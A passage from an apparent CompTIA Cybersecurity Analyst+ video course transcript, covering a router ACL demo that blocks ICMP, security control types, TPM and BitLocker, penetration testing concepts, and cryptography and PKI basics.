multiple copies of user credentials, for example, we have got one central copy that is trusted by multiple
applications. So therefore, there has got to be some configuration, of course, so that various applications trust
the central identity store and also the central identity store has to trust the relying applications. Now the idea is
that Identity Federation is a single set of credentials that allows Web Single Sign-On for web applications.
Authorization occurs after successful authentication. We should be following the principle of least privilege so
that we only assign permissions that are absolutely required and nothing more. This is often done through
access control lists or ACLs at various levels. So we could have an ACL controlling access to various portions
of a web site or within an application. ACLs can control degrees of access to the file system on a server or
access to a network itself through network ACLs, which are often called network packet filtering rules.
Other examples of logical controls include antimalware, hardware tokens used for VPN authentication where
the hardware token is going to have a numeric code that changes periodically that is synchronized with the
VPN appliance. So we have to enter in that unique numeric code within a certain timeframe to successfully
authenticate to the VPN. Password policies are another example of logical controls as our NTFS file system
permissions.
In this video, you will learn how to configure router ACL rules to block ICMP traffic.
Objectives
[Topic title: Configure Router ACL Rules. The presenter is Dan Lachance. The Cisco Packet Tracer Student
window is open. Running along the top of the screen is the menu bar. The menu bar includes the File, Options,
and Help menus. The rest of the screen is divided into two sections. The first section includes The Logical,
New Cluster, and Viewport tabs. By default, the Logical tabbed page is open. The Logical tabbed page
includes a diagram. In the diagram, the PC-PT Client is connected to the 1841 Router1 via the 2950-24
Switch0. The 2950-24 Switch0 is further connected to the Server-PT Local DNS Server. The 1841 Router1 is
connected to the 2950-24 Switch1 via 1841 Internet and 1841 Example routers. The 1841 Internet is further
connected to the Server-PT Root DNS Server. The 2950-24 Switch1 is connected to the Server-PT
server.example.com and Server-PT authority.explains.com.] In this video, I'll demonstrate how to configure a
router ACL rule.
ACL stands for access control list. And, on a router, it essentially either permits or denies traffic into or out of
a specific router interface. So essentially, it's traffic filtering kind of like a packet filtering firewall. In our
diagram, we can see on the left that we have got a client PC that needs to go through a router here called
Router 1 in order to access our HTTP web server over here on the right, which has a DNS name of
server.example.com. So, in our diagram, the first thing we'll do is click on our client PC. [Dan clicks the PC-
PT client and the Client window opens. The Client window includes the Physical, Config, and Desktop tabs.
By default, the Physical tabbed page is open. The Physical tabbed page is divided into two sections. The first
section includes the MODULES and PT-CAMERA options. The second section includes the Zoom In, Original
Size, and Zoom Out tabs.]
Now this is a simulator. So, in the simulator here, I'm going to go to the Desktop tab and click on Command
Prompt. [The Desktop tab includes the Terminal, Command Prompt, Web Browser, and VPN icons. He clicks
the Command Prompt icon and the command prompt opens.] The first thing we're going to do is make sure
that we have got any type of connectivity at all. So I'm going to try to ping our web server by name. I'm going
to type ping server.example.com. So we can see that DNS resolved server.example.com to the IP address of
10.4.0.3. And of course, we have got a number of replies. So we know that ICMP network traffic is working
through Router 1 because we are getting these replies back. What we're going to do in our example is
configure an ACL rule on Router 1 that doesn't allow ICMP traffic, but we still want to be able to connect to
our web server. [He closes the Client window and the Cisco Packet Tracer Student window reappears.]
So, to begin this, if I were to take a look by simply hovering over Router 1 in my diagram, it will pop up and
give me a little bit of details about some of the network interfaces, which I can also click on the router to see as
well. [He clicks the 1841 Router1 and the Router1 window opens. The Router1 window contains the Physical,
Config, and CLI tabs. By default, the Config tabbed page is open. The Config tabbed page includes three
sections. The first section is the navigation pane. The navigation pane includes the GLOBAL, Settings, and
FastEthernet0/0 options. The second section is the content pane. He clicks the FastEthernet0/0 option and its
content is displayed in the content pane. The content pane includes the MAC Address, the Subnet Mask, and Tx
Ring Limit text boxes. The third section includes the Equivalent IOS Commands text box.] For example,
FastEthernet0/0 – we can see that interface here. This is the one that we're going to be using to control traffic
coming in from the PC on the left. Basically, we want to block ICMP traffic. [He closes the Router1 window
and the Cisco Packet Tracer Student window reappears.] So what we're going to do is click right on the router
in the simulator and click the CLI tab. [He clicks the 1841 Router1 and the Router1 window opens.] CLI
stands for command line interface. [The CLI tabbed page includes the IOS Command Line Interface, the Copy
button, and the Paste button.] So now what we're going to do is make sure that we configure an access list to
basically deny ICMP and allow all other IP traffic. To do that, I will type access-list 101. That's the number I'm
denying ICMP from anywhere to anywhere. [He types the following command in the IOS Command Line
Interface: access-list 101 deny icmp any any.] So I want to block all ICMP. At the same time, I'm going to use
the access list command again – access list 101. But this time I'm going to permit IP traffic – so from anywhere
to anywhere. [He types the following command in the IOS Command Line Interface: access-list 101 permit ip
any any.] So of course, ICMP and IP are completely differently protocols.
Next thing I want to do is go into the configuration of the appropriate network interface I want to apply those
rules to. So I'll type interface, now Fast Ethernet or FA0/0 is what I want to connect to. [He types the following
command in the IOS Command Line Interface: interface fa0/0.] So my prompt now implies with the if
command for interface that I'm now configuring that specific interface. Okay, that's great because now I want
to use the ip access-group command, specify the number of my access list – 101 – and tell up that I wanted to
bind to this network interface for inbound traffic, so in. [He types the following command in the IOS
Command Line Interface: ip access-group 101 in.] Now, at this point, it should be ready to go. And what that
means is that ICMP traffic should not be allowed, but all other IP traffic should be. Now, in the production
environment, first of all, you would probably be sitting at a station using PuTTY or some other remote tool to
SSH into your router. Secondly, don't turn off ICMP as we have done in this example unless you're absolutely
sure it isn't required by something in your network environment.
So let's go ahead and test this. I'm going to click the client PC in our simulator over on the left. [He clicks the
PC-PT Client and the Client window opens.] And I'm going to run a Command Prompt. So first thing I'll do is
try to ping server.example.com once again. However, notice this time that we get a destination host
unreachable where previously we were getting replies, that the only thing that's changed here is that our router
ACL doesn't allow ICMP. So that appears to be working. However, do we have any other type of connectivity
through Router 1? [He closes the command prompt.] So, to test that, I'm going to start a web browser on our
PC in our simulator. [He clicks the Web Browser icon and the Web Browser window opens. The Web Browser
window includes the URL text box, the Go button, and the Stop button along the top.] And we're going to see if
we can connect to server.example.com over HTTP because it is our web server. [In the URL, he types
http://server.example.com. Then he clicks the Go button.] And sure enough this sample page popped up where
we can see the blue test with the name of the server. [Below the URL text box, the name of the server is
displayed, which is server.example.com, which is also known as www.example.com.] So we know that we
have still got HTTP traffic, but we don't have ICMP connectivity through Router 1.
In this video, you will learn how to identify administrative security controls.
Objectives
[Topic title: Administrative Controls. The presenter is Dan Lachance.] In this video, we'll discuss
administrative controls.
Administrative security controls are defined by organizational policies and procedures, which could be
influenced by laws and regulations or business contracts. They include things like how to deal with personnel
in a secure manner – which would include things like secure background checks and so on – as well as the
adherence to business practices, ongoing monitoring and improvement.
Administrative controls have a number of categories such as preventative controls. These types of controls
minimize damage by preventing negative incidents or attempting to prevent them in the first place. It would
include things like mantraps controlling access to a physical facility where the outer door must close before an
inner door opens. And this will prevent people from tailgating or payback and coming in behind you without
knowing. Door locks are considered preventative administrative controls as is the separation of duties. Now
separation of duties ensures that we don't have one person that that can control on entire business process from
beginning to end. We have multiple people involved. However, if those people have colluded together to
commit fraud, for example, separation of duties can prevent that. Hiring and background checks are definitely
preventive administrative controls related to personnel as is disaster recovery planning and business continuity
planning to ensure that we can get systems and business processes back up and running as quickly and
efficiently as possible in the event of a negative incident.
Detective administrative controls are used to discover negative events that have occurred after they have
occurred. Things like intrusion detection systems or IDSs – which can detect anomalies and report on them,
but don't stop them – that's where intrusion prevention systems would come in. Rotation of duties within an
organization is considered a detective administrative control because when a new employee fills a position,
they might notice a discrepancy or an anomaly from the previous person that held that role. Same thing is true
with mandatory vacations. Security audits are sometimes required in order for organizations to comply with
what is required for certain types of businesses, but at the same time, security audits can also be used to
identify suspicious activity after it's already occurred. And we can learn from that to harden our environment.
Corrective administrative controls allow us to get things up and running – so for example, restoring a business
process to its original functional state, maybe, after a server that supports that process crashes. Data backups
are corrective administrative controls that we can use to restore data in the event of a problem. Intrusion
prevention systems can also not only detect and report on anomalies, but take steps to prevent them from
continuing. So therefore, they are considered corrective and not just detective administrative controls. The
execution of a disaster recovery plan is also considered a corrective administrative control-related action.
Learn how to identify security controls that compensate for other controls that are not fully effective.
Objectives
[Topic title: Compensating Controls. The presenter is Dan Lachance.] In this video, I'll talk about
compensating controls.
There are many different categories of controls that can be used to secure business processes or assets. With
compensating controls, these are used when more complex or expensive solutions just aren't practical. Now we
also might have an inability to comply with specific security requirements due to business or technical
restraints such as limits within our budgets or even a limit with our internal skillset. Compensating controls
need to address the original intent of the security requirement. And the great news is that we can even use
multiple compensating controls in place of one more complex or expensive solution.
Continuous monitoring ensures that our compensating controls are still effective in protecting business
processes or assets. In some cases, due to legal or regulatory compliance, we might have to use specific
compensating controls. Now, because we have got an ongoing changing business and technical environment,
that requires us to continuously monitor all of our security controls. We can do that using a variety of solutions
including a Security Information and Event Monitoring system or SIEM.
Some examples of compensating controls include a requirement where we have to prevent unwanted network
access. So our compensating control might be to disable unused switch ports. Another requirement might be
segregation of duties as related to a specific business process. Our compensating control might be to use video
surveillance within the facility. Another requirement might be to use multifactor authentication for each
application. However, a compensating control instead might be to use network access control to control
network access in the first place with multifactor authentication. When you look at specific requirements such
as with PCI DSS for organizations that deal with cardholder information for credit and debit cards, they'll list
some compensating controls that might be used in place of other more complex or expensive solutions.
[Topic title: Continuous Monitoring of Controls. The presenter is Dan Lachance.] The implementation of a
security solution does not mark the end of our responsibility as IT security technicians. In this video, we're
going to talk about continuous monitoring of controls.
Information Security Continuous Monitoring or ISCM is just this where we can continuously monitor the
effectiveness of security controls. It also allows for the timely response to threats that are ever-changing.
Threat prioritization is also possible for the proper allocation of project teams and resources. So, in the end,
we're evaluating the effectiveness of security controls by constantly monitoring their effectiveness and how
they are used. We might be required to do this for compliance with certain laws and regulations, which in turn
might actually influence the crafting of our organizational security policies. In some cases, it might also dictate
the use of compensating security controls in place of more expensive or more complex solutions.
With continuous monitoring, collected data gets periodically analyzed, which allows for risk management.
Risk management allows us to look at the acceptance of risk by engaging in certain business activities or risk
mitigation by using certain types of security controls, in some cases, even risk transfer – for instance – to a
public cloud provider or to an insurance company. Real-time monitoring is possible with systems including
Security Information and Event Management systems, otherwise called SIEM.
Information sources for continuous monitoring come from a multitude of places including log files, which
could be for network devices, servers, client devices, applications, and so on. We can also take a look at
vulnerability scan results as an information source for continuous monitoring of our controls because this will
point out any vulnerabilities that we need to address. So it'll also lend itself to threat prioritization. Audit
findings are a valuable gold mine of information. For instance, if we're being audited by a third party that
doesn't know anything about our system and has no interest specifically other than conducting an audit, then
we can use that to learn about weaknesses and then make changes to security controls.
People are also another information source – people that notice suspicious activity whether it's physical or on
the network. And of course, we can take a look at existing business processes to determine if we need to make
changes to further harden our environment.
[Topic title: Hardware Trust. The presenter is Dan Lachance.] In this video, we'll talk about hardware trust.
Firmware is essentially software embedded in a chip. And it's usually for a very specific use unlike an
operating system, which can do millions of things. So therefore, there is often much more trust placed in
hardware or firmware security solutions. One example of this is the Trusted Platform Module or TPM. This is
a firmware standard built in to modern laptops, desktops, and servers. It's part of a chip on the motherboard.
Now TPM can also be built in to the firmware and other devices like set-top boxes, smartphones, and even
tablets. It's part of the NIST-trusted computing requirements in Special Publications 800-147, 155, and 164,
which you could search up in your favorite web browser search engine.
TPM or Trusted Platform Module is firmware that can store cryptographic keys. Now this is used, for instance,
by softwares – such as Microsoft BitLocker – to store keys that are used for encryption and decryption of
entire disk volumes. However, specific solutions like Microsoft BitLocker can also allow keys to be stored on
USB thumb drives for non-TPM systems. TPM, when it gets initialized at the firmware level, creates what's
called a storage root key or SRK. Application-based keys are then protected by the storage root key. TPM
deals not only with the encryption and decryption of entire disk volumes, but it also can detect boot changes to
the boot environment.
So therefore, it's considered an effective mitigation against bootkit threats or master boot record or MBR
rootkits or even the 2011 Membroni attack. Membroni is another form of a bootkit attack. Essentially, it can
make changes to BIOS configurations and, in fact, the master boot record. Or you know, there are also some
bootkit threats that can actually flash or wipe the BIOS on a system making it unusable. Now with TPM, when
it gets configured and when it detects a boot-up change, the system will reboot and you will need to enter a
recovery key password to continue because it's considered suspicious activity.
Microsoft BitLocker is disk volume encryption. It doesn't encrypt specific files or folders like Microsoft EFS,
which stands for Encrypting File System. It's not tied to the user and it's designed really to protect data at rest.
So, when a system boots up and a BitLocker encrypted volume is decrypted, its business as usual and there is
no special protection. So it's designed for not only fixed disks, but also removable media where Microsoft
BitLocker To Go can be configured to encrypt data, for instance, on USB thumb drive. It can also be
configured to require a PIN at startup.
[The BitLocker Drive Encryption window opens. It includes the C:BitLocker off drive, the Data (D): BitLocker
off drive, the NEW VOLUME (E:) BitLocker off drive, and the USB (G:) BitLocker off drive.] Here, in the
Windows environment, I have started the BitLocker tool where I can see all of my disks such as C: where it
states that BitLocker is off. [The C: BitLocker off drive includes the Turn on BitLocker link.] Although, I do
have the option of turning on BitLocker for C: as well as my other fixed data drives. Because I have got a USB
thumb drive inserted, I have also got G: – in my case – listed down here where it says BitLocker is off where I
can configure BitLocker To Go. [Dan maximizes the USB (G:) BitLocker off drive. It includes the Turn on
BitLocker link.] And, if I were to click on that drive and then click on the Turn on BitLocker link, it goes
through a wizard that allows me to secure or encrypt the data on that USB thumb drive.
[The BitLocker Drive Encryption (G:) wizard includes the Use a password to unlock the drive checkbox, the
Use my smart card to unlock the drive checkbox, and the Next button.] For BitLocker To Go, I can flag
whether I want to Use a password to unlock the device either on this machine or others and/or the ability to use
a smart card to unlock the drive. [He selects the Use a password to unlock the drive checkbox and the Use my
smart card to unlock the drive checkbox. Then the Group Policy Management Editor window opens. Running
along the top is the menu bar. The menu bar includes the File, Action, and Help menus. The rest of the screen
is divided into two sections. The first section is the navigation pane. It includes the Default Domain Policy
[DC001.QUICK24*7.COM] Policy root node. The Default Domain Policy [DC001.QUICK24*7.COM]
Policy root node contains the Computer Configuration and User Configuration subnodes. By default, the
Domain Policy [DC001.QUICK24*7.COM] Policy root node is selected. The second section is the content
pane, and it contains the Extended and Standard tabs at the bottom. By default, the Extended tabbed page is
open. The Extended tabbed page includes the Computer Configuration and User Configuration subnodes.] To
configure the behavior of BitLocker on a larger scale, I might use Group Policy, which I have got open here.
So what I would do then – in the left-hand navigator under Computer Configuration – is open up Policies -
Administrative Templates - Windows Components. [He expands the Policies folder present under the
Computer Configuration subnode. The Policies folder includes the Software Settings and the Administrative
Templates: Policy definition subfolders. He further expands the Administrative Templates: Policy definition
subfolder. The Administrative Templates: Policy definition subfolder includes the Control Panel subfolder, the
Windows Components subfolder, and the System subfolders. He expands the Windows Components subfolder.
The Windows Components subfolder includes the Biometrics, the BitLocker Drive Encryption, and the Edge
UI subfolders. He selects the BitLocker Drive Encryption subfolder. ] Then I would choose BitLocker Drive
Encryption. [The BitLocker Drive Encryption subfolder includes the Fixed Data Drives and the Removable
Data Drives subfolders.] So here I have got options for Fixed Data Drives versus Removable Data Drives as
well as just some general BitLocker Drive Encryption options. [He selects the Bitlocker Drive Encryption
subfolder. The Content pane includes the Fixed Data Drives folder and the Prevent memory overwrite on
restart option. He then selects the Prevent memory overwrite on restart option. Then its information is
displayed in the content pane.]
In this video, learn how to identify factors related to conducting penetration tests.
Objectives
identify factors related to conducting penetration tests
[Topic title: Penetration Testing. The presenter is Dan Lachance.] In this video, we'll talk about penetration
testing.
Penetration testing is simply often referred to as a pen test. However, it's not the same as a vulnerability scan.
With the vulnerability scan, we scan a host or a network to identify weaknesses, but none of those weaknesses
get exploited. Well, with the pen test, we are exploiting the weaknesses to see what the reaction is from those
systems. So really, a pen test is testing to discover weaknesses and then exploiting those weaknesses. It can be
applied to a network. A pen test could be for a specific host or even just a specific application as part of the
application life cycle.
There needs to be rules of engagement prior to engaging in penetration testing because we have to think about
the impact or effect on production systems if the pen test is done on live production systems. We don't want a
pen tester bring down a mission critical component that is required for business without thinking about it first
and getting the proper permission. So we might consider then having a separate testing environment, which
may or may not be virtualized. We also have to think about the duration of the penetration test. Will it be
hours? Will it be days? Will it be weeks?
The key here is to think of these things ahead of time prior to the pen test. There might also need to be the
signature of nondisclosure agreements because a penetration test potentially could uncover very sensitive
information that the data owners thought was protected would not be unveiled through a pen test. There also
needs to be a testing schedule that is set ahead of time. Now, in some rare cases, a pen test schedule might not
be known by the network or data owners. And that's part of the point of the pen test as you never really know
when malicious users will strike. However, we might have a testing schedule that is known by all parties that
might take place after hours.
With penetration testing, we can have various teams. A red team, for instance, will be the team that would
attack an IT system, whereas a blue team would defend IT systems. The white team will be used to identify
weaknesses and then report them instead of exploiting them. Now this might be a hybrid of internal personnel
IT technicians and an external pen test team. Or it could be completely done externally. Or you might only use
a portion of these types of teams. The idea is that a pen test is a live attack-and-defense exercise where we
would involve multiple teams, should we choose to use them. We can also use tabletop or whiteboard exercises
to step through an attack and the mitigations against it to stop it.
With white-box testing, it is a pen test that gets run with full knowledge of the IT system being tested. Now
grey-box testing is a pen test that's being conducted with only partial knowledge of an IT system. Now that
could mirror, for example, a malicious user that's done some reconnaissance and learned a little bit and
inferred a little bit about how an IT system is configured. Black-box testing is a pen test where there is no
knowledge at all of an IT system. Now, for a hardened environment, reconnaissance might not reveal much of
anything useful to an attacker. So we can look at the various types of tests that we can be conducting against
our networks, hosts, or apps from various perspectives. There is also the aspect of social engineering, which
can also be a part of the pen test. It doesn't all have to be technical tools. Social engineering is tricking people
into somehow providing sensitive information they, otherwise, normally wouldn't provide. That might be in
the form of, during a pen test, part of the team calling up end users pretending to be a part of the helpdesk to
retrieve sensitive information.
Exercise Overview
[Topic title: Exercise: Mitigations and Security Control types. The presenter is Dan Lachance.] In this
exercise, you'll begin by identifying characteristics of host hardening followed by describing the purpose of a
honeypot, identifying standards bodies that provide IT security guidance, you will contrast physical, logical,
and administrative controls, and finally you will discuss the purpose of penetration testing. At this time, pause
the video and perform each of these exercises and come back to view the answers.
Solution
Host hardening includes many aspects such as firmware patches being applied either to expansion cards or to
the BIOS on the motherboard. Software patches, changing default configurations, the use of complex
passwords, and removing unneeded services also fall under host hardening.
A honeypot is a system that's intentionally left vulnerable. The purpose is so that we can track malicious
activity. However, care must be taken when using honeypots so that the honeypot doesn't get compromised by
malicious users and is then used to attack others. There is also the unintentional data leakage that we have to
consider.
Standards bodies that provide IT security guidance include the National Institute of Standards and Technology
or NIST, the International Organization for Standardization or ISO, and also the Open Web Application
Security Project or OWASP, which focuses specifically on web application security.
Physical security control types include things such as video surveillance and mantraps, whereas logical
security control types include examples such as network ACLs and multifactor authentication. Administrative
security control types include things such as background checks for employees as well as mandatory vacations
to point out anomalies.
Penetration testing is a type of test that's used to discover weaknesses. But, not only discover, also exploit
weaknesses. We can apply penetration testing to an entire network, to a specific host, or even down to a
specific application.
CompTIA Cybersecurity Analyst+: Protecting Network Resources
Authentication controls who gets access to resources. Stronger authentication means greater control over
resource access. Discover network protection techniques, including cryptography, biometrics, hashing, and
authentication.
Table of Contents
Objectives
[Topic title: Cryptography Primer. The presenter is Dan Lachance.] In this video, I'll talk about cryptography.
Cryptography protects digital data. It provides confidentiality, integrity, and authentication. Cryptanalysis, on
the other hand, is the close scrutiny of a cryptosystem to identify weaknesses within it. Encryption and
decryption of data is essentially data scrambling to prevent access to data from unauthorized users.
Authentication is used to verify the authenticity of origin of data. In other words, in the case of e-mail perhaps,
we have a digitally signed message that we can verify – really it did come from who it says it came from. So
the sender cannot refute the fact that it was sent. And this is called nonrepudiation. Now this is because the
sender would have possession of a private key. And only that private key is used to create a digital signature.
And no one else would have that private key. Hashing is used to verify data integrity. If a change is made to
data when we compute a hash, it will not match an original hash taken prior. So we know that something is
changed.
In cryptography, there are some terms that we have to get to know very well, one of which is plain text. This is
data that hasn't yet been encrypted. Ciphertext is encrypted plain text. So it's the result of feeding plain text to
an algorithm with a key. Encryption and decryption might require a single key, a symmetric key, or two keys
that are mathematically related – a public and private key pair – depending on the algorithm being used.
Ciphertext gets derived by taking plain text – seen here as Hello World! – combining it with a key, which we
see on the screen, [The key displayed on the screen is Q#$TAH$kskk3g2-.] and feeding that into an algorithm.
The result on the other end of the algorithm is our encrypted ciphertext. [The ciphertext is Gh%*_+!3BAL3.]
Cryptographic algorithms are also called ciphers. Essentially, they are mathematical formulas. Data and a key
are fed into the algorithm to result in the ciphertext. There are many IT solutions that allow the configuration
of specific ciphers that are to be used such as within a web browser or when configuring a VPN tunnel and so
on.
Stream ciphers encrypt message bits or bytes individually. And they're generally considered faster than their
counterpart block ciphers, which we'll talk about in a moment. However, stream ciphers don't provide
authenticity verification of a message. So examples of stream ciphers include RC4. This algorithm or stream
cipher is used with Wired Equivalent Privacy or WEP as well as Wi-Fi Protected Access – WPA.
However, it is considered vulnerable. So it shouldn't be used. Block ciphers encrypt blocks of data many bytes
together at once as opposed to bits or bytes individually like stream ciphers do. So, as a result, padding might
be required to ensure that blocks are always the same size. Examples of block ciphers include the Digital
Encryption Standard or DES, 3DES, Advanced Encryption Standard or AES, Blowfish, and Twofish.
With symmetric encryption and decryption, one key encrypts and decrypts. It is the same key. With
asymmetric encryption and decryption, we have mathematically related key pairs where the public key is used
to encrypt and the related private key can be used to decrypt a message. Keys have various attributes, such as
the length. And the smaller the length, the more susceptible the key would be to some kind of a brute force
attack.
Now a brute force attack attempts every possible key. If we look at DES, it has a 56-bit key length. And it has
been proven breakable. However, AES 256-bit on the other hand has not yet been proven breakable. Other
types of attacks include a known plain text attack where the attacker knows some or all of the original plain
text before it resulted in ciphertext. Now, once that gets cracked, the attacker could then decrypt other
messages once they learn of the key.
[Topic title: Symmetric Cryptography. The presenter is Dan Lachance.] In this video, we'll talk about
symmetric cryptography. Symmetric cryptography uses a single private key, and this is often called a secret
key or a shared secret. This secret key is used to both encrypt and decrypt. So there aren't two keys, there is
only one. But there is a lack of authentication. But a hashing algorithm can be used separately to verify data
integrity.
Generally, symmetric cryptographic algorithms are considered to execute faster than asymmetric algorithms,
which use different yet related keys. Symmetric cryptography is used in many ways including with Wi-Fi
preshared keys such as those used with WPA and WPA2 wireless security. But symmetric cryptography can
also be used with file encryption or other standards such as IPsec.
Consider the example of a Wi-Fi router with clients that need to connect to the wireless network. So the
administrator then needs to configure a preshared key on the Wi-Fi router. Connecting devices then must know
and configure that same preshared key in order to connect and be authenticated with the access point. Here, in
the configuration of a wireless router, [The ASUS Wireless Router RT-N66U web page is open. It includes
several sections such as General, Advanced Settings, and System Status.] we can see over on the right the
name of the wireless network or the SSID. [The name of the wireless network or the SSID is linksys. It is
displayed under the System Status section.] But we can also see the Authentication Method, which in this case
is set to WPA2-Personal.
Now, using WPA2-Personal or WPA-Personal, requires the configuration of a key. Now the key that we
configure must be known by connecting clients, so this is symmetric encryption. The difficulty with symmetric
cryptography is how to safely distribute keys on a large scale, such as over the Internet, how do we get the key
to everybody because all that a malicious user needs is the key. If they intercept a transmission, such as an e-
mail message that itself is not encrypted containing the key, then they can decrypt all messages.
The other difficulty is that the sender and receiver must have the same key to communicate. And possession of
the key means that decryption is possible for all messages. Examples of symmetric algorithms include RC4,
DES, 3DES, Blowfish, and AES. In this video, we discussed symmetric cryptography.
[Topic title: Asymmetric Cryptography. The presenter is Dan Lachance.] In this video, I'll go over asymmetric
cryptography. Asymmetric cryptography uses two mathematically related keys – public key and the private
key. The public key is used for encryption, and the mathematically related private key decrypts. Asymmetric
cryptography also provides authentication, so we can be assured that a transmission or a message comes from
who it says it came from.
Data integrity is a part of asymmetric cryptography also, so we can detect if changes have been made to data.
However, it's generally considered slower than symmetric algorithms. With asymmetric cryptography, the
problem of distributing keys securely even on a large scale disappears. And that is a big problem with
symmetric cryptography since the same key is used for everything. The public key can be shared with
everyone. Private keys, however, not quite the same, they need to be kept secret to the owner.
Keys can also be exported from a PKI or Public Key Infrastructure certificate that's issued. Now, if we're going
to export a private key, then it needs to be stored in a password-protected file. For instance, here in Internet
Explorer, I'm going to open up my Tools menu and I'm going to go all the way down to Internet options at the
bottom. [The Internet Options dialog box opens.] Then I'll go to the Content tab where I can click the
Certificates button. [The Certificates dialog box opens.]
I'm going to go to the Personal tab here where I'm going to select a personal certificate that was issued to
myself. Now that could be issued by a Certificate Authority, or a CA, or in some cases, such as with Windows,
the first time you encrypt a file using encrypting file system – EFS – you don't already have a user certificate,
one will be created for you.
However, the certificate comes to be when you select it here, you have the option of choosing Export down at
the bottom. [He clicks the Export button and the Certificate Export Wizard opens.] When you go through the
wizard, you have the option of exporting the private key. Now the public key is exported normally. And you
might export the public key from your certificate to give to another user so that they can encrypt, for example,
e-mail messages that they send to you because you will decrypt it with your private key.
Let's dive into the e-mail encryption example a bit further. Pictured here on the left, we have user Bob and on
the right we have user Alice. In this example, Bob wants to send an encrypted e-mail message to Alice. So
what happens is that Bob encrypts the message to Alice with Alice's public key. So one way or another, Bob
has to possess Alice's public key.
Now perhaps Alice exported it and provided it to Bob or perhaps Bob was able to read that from a centralized
address book, there are many ways to acquire public keys. And it's okay to share public keys with everybody.
That's why they are called public. So, again, Bob encrypts the message to Alice with her public key. Alice, on
the other hand, will decrypt the message with her related private key to which only she should have access.
These keys are stored in a PKI or X.509 certificate. And these certificates are issued by a Certificate Authority
or CA. Here the Certificate Authority could be within your company or it might be a third-party out on the
Internet. However, PKI certificates and by extension their keys eventually expire. Key pairs that are issued to
users or it could be issued to devices or applications are unique.
However, in some cases, they could be susceptible to a man-in-the-middle attack. Now, with the man-in-the-
middle attack, we've got an impersonation of an entity that's already communicating with another party. So
what could happen is that an impersonated public key could be provided to an unsuspecting sender.
So a public key, of course, is used to send encrypted data. And we could be fooling someone, if we are the
malicious user in this example, to send us sensitive information whether sender thinks it's going to someone
else and it's encrypted, therefore protected. Examples of asymmetric cryptographic algorithms include RSA,
Diffie-Hellman, and ECC.
Objectives
[Topic title: Public Key Infrastructure. The presenter is Dan Lachance.] In this video, I'll discuss Public Key
Infrastructure. Public Key Infrastructure is often called PKI. It's a hierarchy of digital security certificates that
are also sometimes called X.509 certificates. These certificates are issued by a Certificate Authority, otherwise
called a CA. And they get issued to a user or a device or an application. Certificates among other things
contain a unique public and private key pair that are used for things like encryption, decryption, and the
creation of verification of digital signatures.
With the Public Key Infrastructure at the top of the hierarchy, you've got the Certificate Authority, or CA.
Under which, you could optionally have subordinate Certificate Authorities. So, for instance, in a large
organization, we might have a CA for the company, but we might have a subordinate Certificate Authority for
different parts of the world.
Now, under the subordinate Certificate Authority, we actually have issued PKI certificates for users, devices,
or applications. However, take note that the Certificate Authority itself could directly issue user, device, and
application PKI certificates. Now something that we have to be careful of is the Certificate Authority being
untrusted.
If this is a trusted third-party Internet CA such as Symantec, then most softwares such as web browsers
automatically trust that signer. However, if you build your own Certificate Authority within your company and
you issue PKI certificates – for example – to secure an intranet web server, your devices will not trust the
signature on that web server certificate. So therefore, there is a bit of extra configuration when you use an
internal Certificate Authority.
The other thing to consider is that the top-level or root CA should be taken offline and kept offline for security
purposes. Now what that means is that if the Certificate Authority were to be compromised, all certificates
underneath it – which is everything in the hierarchy – would also be considered compromised.
So root-level or top-level CAs should be taken offline. Certificates themselves have an expiry date. This is set
by the issuing CA. And it can differ. It might be one year, might be five years, could be eight years. Either
way, upon expiration, the certificate can't be used any longer. So, before expiration, the certificate can be
renewed. So it doesn't have to be completely reissued.
A compromised PKI certificate can be revoked. So therefore, the certificate can no longer be used. Inside a
digital PKI certificate, we have many things including the digital signature of the signing Certificate Authority
that issued the certificate. There's also the subject identity where for a user it might be their e-mail address or
for a web site it might be the URL to that site.
There is also an expiration date within a PKI certificate as well as, of course, a unique public and private key
pair. Additionally, you'll have key usage information that defines how keys within the certificate are to be
used. There might also be the location of a certificate revocation list or CRL. This is usually in the form of a
URL. In other words, it's a site where we can pull down a list of serial numbers for revoked PKI certificates
that are not to be trusted.
Third-party certificates are often trusted on the Internet. However, self-certified certificates are not trusted.
And that's back to our example of having your own CA within your company. So devices and applications then
would have to be configured to trust that self-certified CA. Certificates can also be issued through something
called auto-enrollment. And this is often used in a closed or corporate enterprise type of environment.
For example, in a Microsoft Active Directory network, we can use Group Policy to configure auto-enrollment
once devices refresh Group Policy. This way we have a centralized and trusted way to issue certificates on a
larger enterprise scale. Here, in my web browser, if I – in this case – go to the Tools menu because it's Internet
Explorer and all the way down to Internet options, [The Internet Options dialog box opens.] then go to the
Content tab, I can then click the Certificates button. [The Certificates dialog box opens. It includes the
Intermediate Certification Authorities and Trusted Root Certification Authorities tabs.]
Now interestingly, I can see Intermediate Certification Authorities whose signatures are trusted by this web
browser. [Some of these authorities are GlobalSign Root CA, AddTrust External CA, and COMODO RSA
Certificate.] I can also go to trusted roots – in other words, the top of the hierarchy. Here I have an
alphabetical list of trusted certificate root authorities that can issue certificates. [Some of these authorities are
AddTrust External CA Root, azuregateway-838c8, Baltimore CyberTrust Root, and Certum CA.] So, for
example, if we trust the Baltimore CyberTrust Root listed here in Internet Explorer, then by extension we trust
every certificate issued under that hierarchy.
Now, if you connect – for example – to a web site that is secured over HTTPS with an SSL or a TLS
certificate, your browser will be consulted to verify whether or not it should trust the signature. And, if it
doesn't, it will pop-up with the message that tells the user that they probably should not proceed to that site
because the certificate is not considered to be valid. Notice here that we have Import and Export options. [He
points to the Import and Export buttons in the Certificates dialog box.] So, for instance, we could import a
trusted root certificate root key that we have created within our own environment. In this video, we discussed
Public Key Infrastructure.
Objectives
[Topic title: Request a PKI Certificate from a Windows CA. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to request a PKI certificate from a Windows Certificate Authority. A Certificate Authority, or
CA, is at the top of the PKI hierarchy, and its purpose is to issue PKI certificates. Or, if it doesn't do it directly,
then it will create subordinate CAs, which in turn can issue certificates. Either way, before you can configure a
certificate to be used for something like a web server as in our example, you have to know some details.
So, before we can request a PKI certificate to secure an HTTPS web server, we need to know the name of the
server. So here at the PowerShell command line, I'm going to ping the name of the server for which I want to
issue a PKI certificate. It's called srv2012-1, and the full name is srv2012-1.fakedomain.local.
So you need to know some of these details before you can request a PKI certificate. In the same way, if you're
requesting a user certificate maybe to digitally sign an encrypt e-mail, you would have to know some details –
things like the user e-mail address and so on. So we now know that we have a valid name that is responding on
the network.
So, at this point, let's go to the Start menu here on our server and type cert – c-e-r-t. We're going to start the
Certification Authority tool because this server already has a CA configured. Now, in the Certification
Authority tool [The certsrv window opens. The window is divided into two sections. The section on the left
